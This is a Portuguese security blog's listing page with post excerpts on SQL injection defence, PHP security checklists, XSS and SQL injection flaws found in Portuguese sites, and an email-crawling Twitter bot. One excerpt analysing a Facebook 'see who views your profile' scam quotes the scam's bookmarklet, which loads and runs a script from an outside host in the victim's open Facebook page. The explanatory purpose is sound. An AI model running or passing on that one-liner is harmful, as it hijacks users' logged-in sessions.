Prepared Statements contra SQL Injection

É muito comum quando se estuda uma linguagem não se dar principal foco ao desenvolvimento em segurança, mas este, em ambientes de produção é um dos factores decisivos do sucesso de uma aplicação e da confiança por parte dos utilizadores. Neste artigo vai ser abordada uma forma de defesa relativa a possíveis ataques de SQL… Continue reading Prepared Statements contra SQL Injection

Análise Facebook: See who views your profile

Para quem não reparou ainda há a circular uma praga no Facebook que utiliza o motivo de permitir ver quem visita o perfil ! Esta página incita o utilizador executar o seguinte código no browser tendo a página do facebook aberta. javascript:(a=(b=document).createElement(‘script’)).src=’//bbbindia4.in/jsp.php’,b.body.appendChild(a);void(0) Este código simplesmente adiciona o código presente na página bbindia4.in/jsp.php à página do… Continue reading Análise Facebook: See who views your profile

URL Rewriting contra ataques ?(!)

O URL Rewriting ganhou muitos adeptos quando surgiu a moda das SEO (Search Engine Optimization) e das USO (User Scan Optimization) de forma a tornar as ligações de mais fácil leitura e percepção do seu conteúdo quer para os Motores de Pesquisa quer para o scan que o nosso cérebro faz quando olha para uma… Continue reading URL Rewriting contra ataques ?(!)

Web Security – You’re Doing it WRONG

É triste o estado de descuido em que se encontram a maior parte dos WebSites nacionais… Não falo ao nível de organização, acessibilidade, usabilidade, design… mas sim ao nível da segurança, ou melhor, à falta dela… Navegar por sites de grandes empresas, de universidades e respectivas faculdades, de sites governamentais, etc. aleatoriamente é quase como… Continue reading Web Security – You’re Doing it WRONG

PHP Security Check-List CheatSheet

Para cada projecto que tenho desenvolvido ultimamente utilizando a linguagem de programação server-side PHP, tenho-me guiado por uma checklist de forma a não me esquecer  de nada evitando assim falhas graves nas aplicações que desenvolvo. Pois a segurança é uma das preocupações que tenho. Esta checklist aborda diversas situações como, casos gerais, casos de input,… Continue reading PHP Security Check-List CheatSheet

Vulnerabilidades Site Novas Oportunidades

Já há algum tempo que tenho andado a investigar sites nacionais em busca de falhas de segurança e quase todos as têm, as mais frequentes são as falhas XSS mas também é muito comum encontrar falhas de SQL Injection. Hoje tive acesso através de um tweet do Público () à informação de que o site… Continue reading Vulnerabilidades Site Novas Oportunidades

PHP Twitter Bot :: Crawling Emails

Um dos projectos que estou a começar a desenvolver é um Twitter Bot que seja capaz de simular o comportamento de um utilizador durante um curto período de tempo, dependendo da configuração que o utilizador lhe quiser dar. Deve também ter todas as funcionalidades que possam ser úteis ou pensáveis para um programa deste género… Continue reading PHP Twitter Bot :: Crawling Emails

O WebDeveloper que Utiliza PHP :: Caminho

PHP é a linguagem de programação web server-side mais utilizada a nível Mundial e neste artigo vão ser retratados os aspectos que devem fazer parte do estudo, do caminho de um WebDeveloper que quer desenvolver em PHP. Entre eles Boas práticas, Frameworks, Segurança, Caching, Buffering e Environments. O Melhor Amigo – PHP Manual Antes de… Continue reading O WebDeveloper que Utiliza PHP :: Caminho

Vulnerabilidade XSS no jogo System Empires

Hoje venho mostrar-vos como é fácil encontrar vulnerabilidades em páginas web, para inaugurar esta nova “categoria” do blog o website escolhido foi o jogo web-based System Empires jogo este que tenho vindo a jogar e a falha nele explorada será o tipo de falha Cross-site scripting (XSS) esta falha, para os que não sabem, permite… Continue reading Vulnerabilidade XSS no jogo System Empires